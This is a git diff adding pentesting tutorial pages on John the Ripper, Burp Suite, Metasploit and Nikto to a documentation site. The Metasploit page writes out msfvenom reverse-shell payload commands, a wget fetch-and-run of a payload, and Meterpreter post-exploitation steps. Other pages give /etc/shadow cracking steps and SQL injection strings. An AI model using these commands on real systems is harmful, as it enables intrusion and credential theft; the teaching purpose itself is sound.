incremental charset: +john --incremental=ASCII hashes.txt +``` + +### 4) External & Custom Rules + +Create custom rules or use an external program to generate candidates: + +```bash +john --wordlist=custom.txt --rules=custom_rule_set hashes.txt +``` + +You can write external generators in C or other languages and pipe them to John. + +## Practical Examples + +### Crack an MD5 hash with rockyou: + +```bash +echo '5f4dcc3b5aa765d61d8327deb882cf99' > md5.txt # "password" +john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 md5.txt +john --show md5.txt +``` + +### Crack NTLM hashes (Windows): + +```bash +john --format=NT hashes_ntlm.txt --wordlist=/usr/share/wordlists/rockyou.txt +``` + +### Combine `/etc/passwd` and `/etc/shadow` (Linux offline cracking) + +On a local lab VM: + +```bash +sudo unshadow /etc/passwd /etc/shadow > unshadowed.txt +john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt +john --show unshadowed.txt +``` + +`unshadow` merges both files into a cracking-friendly format (present in John’s run directory). + +## Tuning John: Rules, Sessions, Restore + +* **Rules**: John’s `john.conf` contains rule sets (`Single`, `Wordlist`, `Extra`, etc.). Add or tweak rules to increase hit rate without brute forcing everything. +* **Sessions**: + + * Save: `--session=session_name` + * Restore: `--restore=session_name` +* **Show cracked**: `john --show hashes.txt` +* **List formats**: `john --list=formats` +* **Status**: `john --status=session_name` or `john --status` to display progress. + +## Performance Notes & GPU + +* John Jumbo supports OpenCL for GPU acceleration, but **Hashcat** is often preferred for GPU-heavy cracking (faster, more features). +* For CPU-based cracking, John’s incremental modes are efficient and highly optimized. +* Use `--fork=N` to spawn N parallel processes for CPU-bound tasks on multi-core systems (Jumbo builds): + +```bash +john --fork=4 --wordlist=rockyou.txt hashes.txt +``` + +* When dealing with bcrypt, scrypt, or Argon2, expect slow cracking — these algorithms are intentionally expensive. + +## Handling Salted & Iterated Hashes + +* Salted hashes (like many modern storage schemes) are harder — John supports many salted formats (`bcrypt`, `sha512crypt`, `md5crypt`, etc.). +* For very slow hashes (bcrypt/argon2), consider targeted password lists and social-engineering insights rather than blind brute force. + +## Reporting & Documentation + +When performing authorized password audits, include in your report: + +* **Which accounts were cracked** (usernames) — avoid publishing raw passwords in reports; treat them as sensitive. +* **Hash formats and sources** (e.g., `/etc/shadow`, exported DB column). +* **Methods used** (wordlist + rules, incremental, time spent). +* **Risk assessment & remediation**: force password resets, enable MFA, enforce strong password policies, use password hashing best practices (bcrypt/Argon2 with proper salts), deploy rate-limiting and account lockouts. + +Example remediation suggestions: + +* Enforce minimum length (12+) and complexity or passphrases. +* Implement MFA for sensitive accounts. +* Migrate weak hash algorithms to bcrypt/Argon2 with proper parameters. +* Use password screening against breached lists. + +## Hands-On Labs (Safe & Local) + +**Lab A — Crack a test `/etc/shadow`** + +1. Create two VMs: Kali (attacker) and a Linux victim. +2. On the victim, set a few test passwords (weak & strong). +3. Copy `/etc/passwd` and `/etc/shadow` (authorized lab only). +4. On Kali: + + ```bash + unshadow /path/to/passwd /path/to/shadow > myhashes.txt + john --wordlist=/usr/share/wordlists/rockyou.txt myhashes.txt + john --show myhashes.txt + ``` +5. Document which passwords cracked and recommend fixes. + +**Lab B — Hash format identification** + +1. Create sample hashes manually: + + ```bash + echo -n "password" | md5sum + echo -n "password" | sha1sum + ``` +2. Try cracking and explicitly set format flags to see differences: + + ```bash + john --format=raw-md5 md5file + john --format=raw-sha1 sha1file + ``` + +## Best Practices & Safety + +* **Never** publish cracked plaintexts in public reports. Treat them as sensitive evidence. +* Use **dedicated lab environments** and isolated networks for all cracking practice. +* Prefer **wordlist + rules** over blind incremental brute force — faster and often more productive. +* Maintain **audit logs** and explicit consent documentation for any engagement. + +## Quick Command Cheat Sheet + +```bash +# List supported formats +john --list=formats + +# Wordlist + rules +john --wordlist=/usr/share/wordlists/rockyou.txt --rules hashes.txt + +# Single mode (uses username info & GECOS) +john --single hashes.txt + +# Incremental brute force +john --incremental hashes.txt + +# Show cracked passwords +john --show hashes.txt + +# Resume a session +john --restore=session_name + +# Use specific format (e.g., NTLM) +john --format=NT hashes_ntlm.txt + +# Use fork to parallelize (Jumbo) +john --fork=4 --wordlist=rockyou.txt hashes.txt +``` + +## Final Thoughts + +John the Ripper is a foundational tool for password auditing. It teaches you where human weaknesses and poor password policies live. Use John to improve security — by finding weak credentials, enforcing better policies, and helping organizations adopt modern hashing algorithms and multi-factor authentication. \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/penetration-testing/burpsuite-overview.mdx b/docs/cybersecurity/cybersecurity-tools/penetration-testing/burpsuite-overview.mdx new file mode 100644 index 0000000..7938b5c --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/penetration-testing/burpsuite-overview.mdx @@ -0,0 +1,218 @@ +--- +title: "Burp Suite Overview" +description: "A practical, hands-on overview of Burp Suite — proxy workflow, core tools (Proxy, Repeater, Intruder, Scanner), extensions, and safe lab exercises for web application testing." +tags: [burpsuite, web-security, penetration-testing, tools, proxy, appsec] +--- + +Burp Suite is the de-facto toolkit for web application security testing. It’s a proxy-based platform that lets you intercept, inspect, and modify HTTP(S) traffic between your browser and a web app, then run scanners, brute-force attacks, and targeted manipulations to find vulnerabilities. + +There are two common editions: +* **Community (Free)** — great for learning and manual testing (no automated scanner or Collaborator features). +* **Professional (Paid)** — adds an automated scanner, Burp Collaborator, advanced Intruder features, and many productivity improvements. + +This guide focuses on practical usage: how to set up Burp, the core workflow, useful modules, and safe labs you can run in a controlled environment. + +## Installation & Quick Setup + +* Download from: https://portswigger.net/burp +* Java is included in the installer for recent versions, but verify requirements on the download page. +* Start Burp: + ```bash + java -jar burpsuite_pro.jar # or run the installer/binary for your OS + ``` + +### Configure your browser to use Burp as a proxy + +By default Burp listens on `127.0.0.1:8080`. + +1. Set your browser’s HTTP & HTTPS proxy to: + + * Host: `127.0.0.1` + * Port: `8080` +2. Install Burp’s CA certificate in the browser to view/decrypt HTTPS traffic: + + * In browser visit: `http://burp` (while Burp is running) → **CA Certificate** → download and import as trusted. + +:::tip +Use a dedicated testing browser profile (or a temporary profile) so you don’t risk trusting the Burp CA on your daily browser. +::: + +## Core Workflow (Proxy → Inspect → Test) + +1. **Proxy (Intercept)** + + * Route browser traffic through Burp Proxy. + * Intercept requests/responses, modify them on the fly, or forward them to the server. + * Useful for understanding request structure, cookies, headers, and parameters. + +2. **Target & Site Map** + + * Burp records all discovered endpoints in the **Target → Site map**. + * Use this to enumerate the application surface and find interesting pages or hidden endpoints. + +3. **Scanner (Pro)** + + * Automatic active and passive scanning of requests to find common vulnerabilities (SQLi, XSS, CSRF issues, etc.). + * Use scan findings as pointers — manual verification and context-aware analysis are crucial. + +4. **Repeater** + + * Send a single request to Repeater and manually tweak values, headers, or payloads to observe responses. + * Ideal for iterative testing of inputs and attack payloads. + +5. **Intruder** + + * Automate input fuzzing, brute force, or parameter enumeration by defining positions and payload sets. + * Extremely powerful but noisy; use carefully and with permission. (Community edition has limited speed and functionality.) + +6. **Sequencer** + + * Analyze randomness of session tokens or anti-CSRF tokens to check for predictability. + +7. **Extender / BApp Store** + + * Install extensions (BApps) to add features — common picks: **Autorize**, **ActiveScan++**, **Logger++**, **Retire.js**. + * You can write custom extensions in Java, Python (Jython), or JavaScript. + +## Key Tools & When to Use Them + +### Proxy (Intercept) + +* Use to examine raw HTTP(S) requests and responses. +* Great for learning how inputs map to server behavior. +* Example: Intercept a login request and change `username=alice` → `username=admin` to test authorization checks (only in-scope/authorized tests). + +### Repeater + +* Manual, iterative testing of a single request. +* Example: Re-send POST requests with modified JSON payloads to test input validation. + +### Intruder + +* Automate injection of payload lists (wordlists, fuzzing sets). +* Use cases: brute-forcing form fields, testing enumeration, header fuzzing. +* Example payload positions: + + ``` + POST /login HTTP/1.1 + username=§USER§&password=§PASS§ + ``` + +### Scanner (Pro) + +* Automated vulnerability discovery. Good starting point but always validate findings manually. +* Configure scan policies — tune for speed vs subtlety on staging environments. + +### Sequencer + +* Paste a set of tokens and check entropy/statistics to assess randomness and predictability. + +### Comparer & Decoder + +* **Comparer:** diff two responses to spot subtle changes. +* **Decoder:** quickly encode/decode URL, Base64, HTML entities, etc. + +## Practical Examples & Short Recipes + +### Intercept & Modify a Request + +1. Set browser proxy to Burp and enable **Intercept**. +2. Trigger a web action (e.g., submit form). +3. In Burp, edit the request (change form fields, headers) and forward. +4. Observe the server response in the Response tab. + +### Manual SQL Injection Testing with Repeater + +1. Find a form or parameter that accepts input. +2. Send request to **Repeater**. +3. Try payloads like: + + ``` + ' OR '1'='1 + ' UNION SELECT NULL, version() -- + ``` +4. Observe response differences and error messages for injection signs. + +### Brute Force a Parameter with Intruder (lab only) + +1. Send a login POST to Intruder → Positions. +2. Clear auto positions; mark username field position. +3. Select **Payloads** → load a username list (e.g., common users). +4. Start attack (monitor response lengths, status codes). +5. Validate any "hits" manually. + +## Burp Extensions & Automation + +The Burp **BApp Store** extends functionality. Popular extensions: + +* **Logger++** — advanced request/response logging. +* **Autorize** — automated access control testing. +* **ActiveScan++** — enhanced scanning checks. +* **Retire.js** — JS library vulnerability detection. + +You can also use **Burp’s REST API** (in Pro) to automate tasks and integrate with CI/CD for scanning staging apps. + +## Safe Testing Practices & Ethics + +* **Only test in-scope targets** — never unauthorized systems. +* **Use staging or local labs** for intrusive tests. +* **Limit impact**: avoid destructive payloads unless explicitly authorized. +* **Record evidence**: save requests, responses, timestamps for reporting and remediation. +* **Coordinate with ops/dev teams**: schedule tests to avoid business disruption. + +## Hands-On Labs + +### Lab 1 — Intercept & Inspect + +* Environment: a local vulnerable app (DVWA, WebGoat, or Juice Shop). +* Goal: Intercept a login request, modify parameters, and observe server behavior. +* Steps: + + 1. Configure browser proxy and install Burp CA. + 2. Log into the app with a test account while intercept is on. + 3. Modify a parameter and forward; document server response. + +### Lab 2 — Repeater XSS Testing + +* Environment: DVWA (stored XSS lab). +* Goal: Manually craft payloads in Repeater to test reflected & stored XSS vectors. +* Steps: + + 1. Identify input and send to Repeater. + 2. Test payloads like `` and encoded variants. + 3. Observe output and use **Decoder** to craft safe encodings. + +### Lab 3 — Intruder Fuzzing (Controlled) + +* Environment: Local staging app with a non-critical admin login. +* Goal: Use Intruder to fuzz headers or parameters to find input validation issues. +* Steps: + + 1. Send request to Intruder, pick parameter positions. + 2. Load a relevant payload list (e.g., common XSS payloads). + 3. Run attack at slow speed and inspect anomalies. + +## Reporting & Evidence + +Good findings include: + +* Full intercepted request/response pairs (saved as Burp items or exported). +* Exact steps to reproduce and the tool/module used (e.g., Repeater, Intruder, Scanner). +* Impact assessment (data exposed, authentication bypassed, business impact). +* Remediation guidance (code/config fixes, input validation, header hardening). + +Attach screenshots where helpful and include raw Burp items for developers to reproduce. + +:::tip Tips & Tricks + +* Use a **dedicated browser profile** for testing and never browse everyday websites through Burp. +* Save useful requests to the **Project** for later automation and scans. +* Learn to use **match/replace rules** to streamline testing (e.g., auto-set headers). +* Combine Burp with other tools (e.g., Nmap, Nikto, OWASP ZAP) for a full coverage approach. +* Keep Burp updated; the BApp ecosystem evolves fast. + +::: + +:::warning Reminder +Burp is a powerful offensive tool, learn responsibly. Only test systems you own or have explicit written permission to test. +::: \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/penetration-testing/metasploit-framework.mdx b/docs/cybersecurity/cybersecurity-tools/penetration-testing/metasploit-framework.mdx new file mode 100644 index 0000000..f200ffc --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/penetration-testing/metasploit-framework.mdx @@ -0,0 +1,249 @@ +--- +title: "Metasploit Framework" +description: "Practical guide to Metasploit, installation, workflow (recon → exploit → post-exploit), common modules, msfconsole and msfvenom usage, and safe lab exercises." +tags: [metasploit, penetration-testing, exploitation, tools, ethical-hacking] +--- + +**Metasploit** is the most widely used exploitation framework in security testing. It bundles hundreds of exploits, payloads, scanners, and utilities into a single platform so you can validate vulnerabilities in a controlled, repeatable way. + +This guide walks you through the Metasploit workflow, how to use `msfconsole` and `msfvenom`, common module types, and safe hands-on labs. Read this as a practical operator’s handbook — not a recipe for misuse. Always get written permission before testing production systems. + +## Safety & Ethics (Short, but critical) + +- **Only test systems you own or have explicit written authorization to test.** +- Use isolated labs (local VMs, VulnHub, Metasploitable, Hack The Box labs) for practice. +- Never weaponize exploits against third-party infrastructure. +- Keep detailed notes and follow your engagement’s rules of engagement (scope, allowed hours, reporting). + +Metasploit is powerful — treat it responsibly. + +## What Metasploit Gives You + +* A modular architecture of **exploits**, **payloads**, **auxiliary** modules (scanners, fuzzers), and **post-exploitation** modules. +* `msfconsole`: interactive console interface and primary workflow. +* `msfvenom`: payload and shellcode generator (replaces older `msfpayload` / `msfencode`). +* Integration with databases for target management and automation (e.g., `msfdb`). + +## Installation (Quick Notes) + +On Kali Linux, Metasploit is preinstalled and maintained via packages. +On other systems, use the official installers or package managers. Also ensure `postgresql` is running when using the Metasploit database. + +Example (simple startup on Kali): +```bash +# Start PostgreSQL (if needed) +sudo service postgresql start + +# Start Metasploit console +msfconsole +``` + +Initialize the database (if required): + +```bash +msfdb init +``` + +## Core Concepts & Module Types + +* **Exploit** — code that takes advantage of a vulnerability to gain access (e.g., `exploit/windows/smb/ms17_010_eternalblue`). +* **Payload** — code executed on the target after exploitation (reverse shell, Meterpreter). +* **Auxiliary** — non-exploit modules for scanning, fuzzing, brute-forcing, and info gathering. +* **Post** — modules run *after* access is obtained (credential dumping, persistence, pivoting). +* **Encoder** — optionally obfuscates payloads to bypass naive signature detection. Use responsibly and with awareness of detection trade-offs. + +## Typical Metasploit Workflow + +1. **Reconnaissance & Scanning** — identify live hosts and services (`nmap`, Metasploit auxiliary scanners). +2. **Select Exploit** — pick an exploit that matches a discovered service/version. +3. **Choose Payload** — pick a payload appropriate to your goal (e.g., `meterpreter/reverse_tcp`). +4. **Set Options** — configure `RHOST`, `RPORT`, `LHOST`, `LPORT`, and other module-specific options. +5. **Launch** — run the exploit and catch the session with a listener. +6. **Post-Exploitation** — gather evidence, escalate privileges, and document findings. +7. **Report** — present clear reproduction steps, impact, and remediation. + +## msfconsole — Basic Commands + +`msfconsole` is the primary interactive interface. Start it simply by running: + +```bash +msfconsole +``` + +Key commands inside `msfconsole`: + +* `search ` — find modules, e.g. `search ms17_010` +* `use ` — select a module, e.g. `use exploit/windows/smb/ms17_010_eternalblue` +* `show options` — show required module options +* `set RHOSTS 192.168.56.101` — set target hosts +* `set LHOST 192.168.56.1` — set your machine IP for reverse connections +* `set PAYLOAD windows/meterpreter/reverse_tcp` — choose payload +* `exploit` or `run` — execute the module +* `sessions -l` — list open sessions +* `sessions -i ` — interact with a session +* `background` — background an interactive session and return to msfconsole +* `jobs` — list running background jobs +* `db_nmap ` — run nmap and import results into Metasploit DB + +Example quick workflow: + +```text +msf6 > search smb +msf6 > use exploit/windows/smb/ms17_010_eternalblue +msf6 exploit(ms17_010_eternalblue) > show options +msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.101 +msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.1 +msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf6 exploit(ms17_010_eternalblue) > exploit +``` + +## msfvenom — Crafting Payloads & Shellcode + +`msfvenom` builds payloads that you can embed into files or run on targets. It supports many formats and encoders. + +Examples: + +* Generate a Windows reverse shell EXE: + +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe -o shell.exe +``` + +* Generate a staged Python payload (raw): + +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o shell.elf +``` + +* Generate a base64-encoded shell for embedding: + +```bash +msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.1 LPORT=4444 -f raw | base64 -w0 +``` + +**Important:** Many payloads are detected by AV and EDR; testing in controlled labs is best. + +## Useful Auxiliary Modules + +* `auxiliary/scanner/portscan/tcp` — port scanning from Metasploit +* `auxiliary/scanner/http/title` — pull web page titles for many hosts +* `auxiliary/scanner/smb/smb_version` — SMB version fingerprinting +* `auxiliary/scanner/ssh/ssh_login` — brute-force SSH credentials (only in-scope) + +Auxiliary modules are handy for scripted discovery and integrating reconnaissance into a single workflow. + +## Meterpreter — The Default Post-Exploitation Payload + +**Meterpreter** is a powerful, in-memory payload that gives you an interactive shell and many post-exploitation features like: + +* `sysinfo` — view target information +* `getuid` — current user context +* `pwd` / `ls` — basic filesystem navigation +* `upload` / `download` — file transfer +* `migrate` — move to another process (for stability/persistence) +* `hashdump` — dump password hashes (requires privileges) +* `screenshare` / `screenshot` — capture the desktop (ethical constraints apply) + +Example session: + +```text +meterpreter > sysinfo +meterpreter > getuid +meterpreter > upload /tmp/patch.exe C:\\Windows\\Temp\\patch.exe +meterpreter > execute -f C:\\Windows\\Temp\\patch.exe +``` + +Always remember: actions like `hashdump`, `screenshare`, and credential harvesting escalate impact and must be explicitly allowed in your engagement scope. + +## Post-Exploitation & Pivoting + +After getting a session you may: + +* Escalate privileges (local exploits, misconfigurations). +* Harvest credentials (cached tokens, password stores). +* Pivot to internal networks using port forwarding or SOCKS proxy: + + ```text + meterpreter > run autoroute -s 10.10.0.0/24 + use auxiliary/server/socks_proxy + set SRVPORT 1080 + run + # Configure proxychains or Burp to use SOCKS proxy + ``` + +Pivoting lets you reach internal services not directly accessible from your initial foothold — again, only in-scope. + +## Hands-On Labs (Safe & Isolated) + +### Lab A — Metasploitable 2 Basic Exploit (Local VM) + +1. Download and run a Metasploitable VM and a Kali VM on the same host-only network. +2. From Kali: `nmap -sV -p- 192.168.56.101` to discover services. +3. In `msfconsole`: `search vsftpd` → `use exploit/unix/ftp/vsftpd_234_backdoor` (example module) +4. Set `RHOSTS`, `LHOST`, choose payload and `exploit`. +5. Interact with the session and run `sysinfo`. +6. Document steps and revert VMs after the lab. + +### Lab B — Generate a Payload and Catch a Session (Local HTTP delivery) + +1. On Kali: `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o /var/www/html/shell.elf` +2. Start a simple HTTP server: `python3 -m http.server --directory /var/www/html 8000` +3. On a controlled target VM, download and run the ELF: `wget http://192.168.56.1:8000/shell.elf && chmod +x shell.elf && ./shell.elf` +4. In `msfconsole`, set `exploit/multi/handler` with the matching payload and `exploit` to catch the session. + +**Important:** Use only in lab environments. Do not test these techniques against third-party servers. + +## Reporting & Evidence + +When a Metasploit test is part of an engagement, capture and record: + +* Exact module names and versions used. +* Module options (`show options`) and payload details. +* Timestamps of activities and session outputs (screenshots, logs). +* Impact analysis: what an attacker could access and how to remediate. + +A concise proof-of-concept and step-by-step reproduction in the report helps developers fix issues quickly. + +## Common Pitfalls & Tips + +* **AV/EDR may block or detect payloads.** Use controlled labs or staging environments. +* **Metasploit modules can be noisy.** Know when to avoid `-A` or aggressive scripts in production. +* **Meterpreter stability:** Migrate to stable processes after exploitation for long-lived sessions. +* **Network routing:** Ensure `LHOST` is reachable by the target (NAT issues often break callbacks). Use reverse proxies or port forwarding if needed. +* **Maintain logs:** Keep detailed logs for legal and remediation purposes. + +## Quick Reference Commands + +```bash +# Start console +msfconsole + +# Search for modules +search smb + +# Use a module +use exploit/windows/smb/ms17_010_eternalblue + +# Show and set options +show options +set RHOSTS 192.168.56.101 +set LHOST 192.168.56.1 +set PAYLOAD windows/meterpreter/reverse_tcp + +# Run exploit +exploit + +# Generate payload +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe -o shell.exe + +# Start handler +use exploit/multi/handler +set PAYLOAD windows/meterpreter/reverse_tcp +set LHOST 192.168.56.1 +set LPORT 4444 +run +``` + +## Final Thoughts + +Metasploit is a professional framework for validating vulnerabilities and demonstrating impact. It accelerates testing workflows and supports powerful post-exploitation tasks — but its power demands responsibility. Practice in isolated labs, follow legal constraints, and always deliver clear remediation guidance when you test systems. diff --git a/docs/cybersecurity/cybersecurity-tools/penetration-testing/nikto-scanning.mdx b/docs/cybersecurity/cybersecurity-tools/penetration-testing/nikto-scanning.mdx new file mode 100644 index 0000000..362bdb2 --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/penetration-testing/nikto-scanning.mdx @@ -0,0 +1,260 @@ +--- +title: "Nikto Scanning" +description: "Learn how to use Nikto, an open-source web server scanner, to identify potential vulnerabilities and misconfigurations in web applications safely and effectively." +tags: [nikto, web-scanning, web-security, penetration-testing, tools, vulnerability-scanner] +--- + +**Nikto** is one of the most widely used open-source web vulnerability scanners. +It’s designed to perform comprehensive tests against web servers, identifying security misconfigurations, outdated software, and known vulnerabilities. + +Nikto doesn’t exploit vulnerabilities — it’s a **discovery tool**. Think of it as a web app doctor: it checks the “health” of your server and reports what’s unsafe or outdated. + +## What is Nikto? + +Nikto is a **command-line based scanner** developed in Perl and maintained by the community at [https://github.com/sullo/nikto](https://github.com/sullo/nikto). +It’s part of most penetration testing distributions, including **Kali Linux** and **Parrot OS**. + +Nikto performs: +* Server version and banner detection +* Vulnerability and misconfiguration checks (over 6,700+ known issues) +* SSL/TLS testing +* HTTP methods testing (e.g., PUT, DELETE) +* Directory and file enumeration +* Cookie and header analysis + +## Why Use Nikto? + +* Quick **initial reconnaissance** of a target web server. +* Identify **insecure configurations**, **default files**, and **outdated versions**. +* Test for **common vulnerabilities** (e.g., directory traversal, outdated server components). +* Generate reports to support **further manual analysis**. + +:::warning Important +Use Nikto only on systems you own or have explicit permission to test. +::: + +## Installation + +If you’re using **Kali Linux**, Nikto comes pre-installed. + +For other systems: + +### Ubuntu/Debian: +```bash +sudo apt install nikto +``` + +### Manual installation: + +```bash +git clone https://github.com/sullo/nikto.git +cd nikto/program +perl nikto.pl -h +``` + +Check version: + +```bash +nikto -Version +``` + +## Basic Usage + +To perform a quick scan: + +```bash +nikto -h http://example.com +``` + +Output: + +``` +- Nikto v2.5.0 +--------------------------------------------------------------------------- ++ Target IP: 93.184.216.34 ++ Target Hostname: example.com ++ Target Port: 80 ++ Start Time: 2025-10-25 10:00:00 +--------------------------------------------------------------------------- ++ Server: Apache/2.4.41 (Ubuntu) ++ Retrieved x-powered-by header: PHP/7.4.3 ++ The anti-clickjacking X-Frame-Options header is not present. ++ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS ++ OSVDB-3092: /icons/: Directory indexing found. ++ End Time: 2025-10-25 10:05:00 (5 seconds) ++ Scan Summary: 200 requests done in 5 seconds, 3 findings reported +--------------------------------------------------------------------------- +``` + +## Useful Command Options + +| Command | Description | Example | +|------------------------------|----------------------------|--------| +| `-h ` | Target host (IP or domain). | `nikto -h http://example.com` | +| `-p ` | Specify target port (default: 80). | `nikto -h example.com -p 8080` | +| `-ssl` | Force SSL mode (treat target as HTTPS). | `nikto -h https://example.com -ssl` | +| `-Tuning ` | Customize types of tests to run (see tuning codes). | `nikto -h example.com -Tuning 12` | +| `-output ` | Save results to a report file. | `nikto -h example.com -output report.html` | +| `-Format ` | Set report format (choose one). | `nikto -h example.com -Format html -output r.html` | +| `-timeout ` | Set connection timeout (seconds). | `nikto -h example.com -timeout 30` | +| `-Plugins ` | Run specific plugins or plugin groups. | `nikto -h example.com -Plugins xss,ssl` | + +### Example: + +```bash +nikto -h https://example.com -p 443 -ssl -output scan_report.html -Format html +``` + +## Tuning Scan Types + +You can limit or expand scan coverage using the `-Tuning` flag. + +| Code | Type of Tests | +| ---- | ----------------------------------- | +| 0 | File Uploads | +| 1 | Interesting File / Directory checks | +| 2 | Misconfigurations / Default files | +| 3 | Information Disclosure | +| 4 | Injection vulnerabilities | +| 5 | Remote File Inclusion | +| 6 | Denial of Service | +| 7 | Remote Code Execution | +| 8 | Command Execution | +| 9 | SQL Injection | + +### Example: + +Scan only for common misconfigurations and file disclosures: + +```bash +nikto -h http://target.com -Tuning 12 +``` + +## SSL/TLS Scanning + +Nikto can test HTTPS configurations: + +```bash +nikto -h https://secure.example.com -ssl +``` + +It identifies: + +* Expired or weak SSL certificates +* Deprecated ciphers or protocols +* Missing HTTP security headers + +## Integration with Other Tools + +Nikto can work in tandem with other security tools: + +| Tool | Integration Purpose | +| -------------- | ----------------------------------------------------------------- | +| **Nmap** | Discover live hosts, then use Nikto for HTTP service enumeration. | +| **Burp Suite** | Use results to target deeper manual tests. | +| **Metasploit** | Import Nikto results for vulnerability correlation. | +| **OpenVAS** | Combine reports for detailed vulnerability assessments. | + +### Example workflow: + +```bash +nmap -p80,443 -oG targets.txt 192.168.1.0/24 +nikto -h targets.txt -output nikto_scan.txt +``` + +## Interpreting Results + +Each finding includes: + +* **Vulnerability description** +* **OSVDB or CVE ID** +* **Severity level** +* **Suggested mitigation** + +Common example findings: + +* Missing security headers (e.g., `X-Frame-Options`) +* Directory indexing enabled +* Exposed backup files (`.bak`, `.old`) +* Outdated server versions + +Always verify findings manually — some may be **informational**, not exploitable. + +## Best Practices + +* Use Nikto in **authorized environments** only. +* Schedule scans during **off-peak hours** to avoid disruption. +* Always **verify results manually** and **prioritize fixes** based on impact. +* Combine with **manual testing** and **code review** for deeper insights. +* Regularly **update Nikto’s databases** to detect the latest issues: + + ```bash + cd /usr/share/nikto + git pull + ``` + +## Hands-On Lab + +### Lab: Scanning a Local DVWA Server + +1. Run DVWA on localhost (e.g., `http://127.0.0.1/dvwa`). +2. Start Nikto: + + ```bash + nikto -h http://127.0.0.1/dvwa -output dvwa_scan.txt + ``` +3. Review the report: + + * Check missing headers. + * Note any outdated server components. + * Verify issues manually. + + +## Example Output (Summary) + +``` ++ Target IP: 127.0.0.1 ++ Target Port: 80 ++ Server: Apache/2.4.41 (Ubuntu) ++ OSVDB-3268: /icons/: Directory indexing found. ++ OSVDB-3233: /phpinfo.php: Output from phpinfo() found. ++ The X-Frame-Options header is not present. ++ Scan completed in 3 seconds. +``` + +## Reporting + +To generate a clean HTML report: + +```bash +nikto -h http://target.com -Format html -output report.html +``` + +Other formats: + +* `txt` (simple text) +* `csv` (for spreadsheets) +* `xml` (for automation pipelines) + +:::tip +Run Nikto behind **Tor** or **proxychains** for privacy during open testing or research (never for unauthorized systems): + +```bash +proxychains nikto -h http://target.com +``` +::: + +## Summary + +| Feature | Description | +| ---------------- | ---------------------------------------------- | +| **Purpose** | Web server vulnerability scanning | +| **Language** | Perl | +| **Speed** | Moderate | +| **Best For** | Initial reconnaissance, configuration auditing | +| **Alternatives** | OpenVAS, Acunetix, Nessus | + + +:::note +Nikto is a **discovery tool**, not an exploitation framework. Always follow ethical hacking principles and test only with explicit authorization. +::: diff --git a/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/nessus-basics.mdx b/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/nessus-basics.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/nessus-basics.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/openvas-setup.mdx b/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/openvas-setup.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/openvas-setup.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/vulnerability-scanning-tips.mdx b/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/vulnerability-scanning-tips.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/vulnerability-assessment/vulnerability-scanning-tips.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/ethical-hacking-basics.mdx b/docs/cybersecurity/ethical-hacking-basics.mdx index f445c02..f19c32a 100644 --- a/docs/cybersecurity/ethical-hacking-basics.mdx +++ b/docs/cybersecurity/ethical-hacking-basics.mdx @@ -8,33 +8,27 @@ Ethical hacking is the practice of legally and responsibly probing systems to fi This tutorial introduces the ethical hacker mindset, the typical testing workflow, common tools, how to build a safe lab, and beginner-friendly exercises — all with a strong focus on legality and responsibility. ---- - ## Who is an Ethical Hacker? An **ethical hacker** (also called a penetration tester or security researcher) is someone who uses hacking techniques with permission to: -- Discover vulnerabilities in systems, applications, or networks -- Demonstrate the impact of those vulnerabilities safely -- Provide practical remediation and recommendations +* Discover vulnerabilities in systems, applications, or networks +* Demonstrate the impact of those vulnerabilities safely +* Provide practical remediation and recommendations Ethical hackers wear many hats: detective, developer, systems engineer, and — importantly — communicator. Delivering a clear, prioritized report is as vital as finding the issue. ---- - -## ⚖️ Ethics & Legal Ground Rules (Read this first) +## Ethics & Legal Ground Rules (Read this first) Before you touch any tool or target, these are non-negotiable: -- **Only test systems you own or have explicit written permission to test.** -- **Don’t exploit bugs in production systems without authorization.** A vulnerability proof-of-concept on a live customer system can cause outages and legal trouble. -- **Follow responsible disclosure policies**: report findings to the owner, give them time to fix, and coordinate public disclosure if applicable. -- **Keep data safe**: never exfiltrate or publish sensitive data encountered during testing. +* **Only test systems you own or have explicit written permission to test.** +* **Don’t exploit bugs in production systems without authorization.** A vulnerability proof-of-concept on a live customer system can cause outages and legal trouble. +* **Follow responsible disclosure policies**: report findings to the owner, give them time to fix, and coordinate public disclosure if applicable. +* **Keep data safe**: never exfiltrate or publish sensitive data encountered during testing. If you want real-world experience, use purpose-built labs (see the Lab Setup section below) or join bug bounty programs that explicitly authorize testing. ---- - -## 🧭 Pentest Methodology — the typical lifecycle +## Pentest Methodology — the typical lifecycle Ethical hacking follows a repeatable lifecycle. Learn this like a recipe — you’ll 